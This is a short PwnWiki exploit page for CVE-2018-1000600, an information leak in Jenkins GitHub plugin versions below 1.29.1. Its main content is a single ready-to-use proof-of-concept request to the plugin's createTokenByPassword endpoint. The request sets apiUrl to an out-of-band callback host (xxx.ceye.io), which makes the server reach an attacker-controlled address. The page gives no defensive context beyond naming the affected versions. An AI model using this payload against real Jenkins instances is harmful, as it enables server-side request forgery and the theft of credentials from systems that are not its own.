CVE-2018-1000600 Jenkins GitHub Information Leak

From PwnWiki
Revision as of 19:39, 30 May 2021 by Pwnwiki (talk | contribs) (Created page with "The POC used is as follows, where user1 is the user name.")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎中文(繁體)‎

Affected version

Jenkins GitHub plugin is less than 1.29.1

The POC used is as follows, where user1 is the user name. 

/securityRealm/user/user1/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://xxx.ceye.io
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2018-1000600_Jenkins_GitHub_信息泄漏/en&oldid=3643"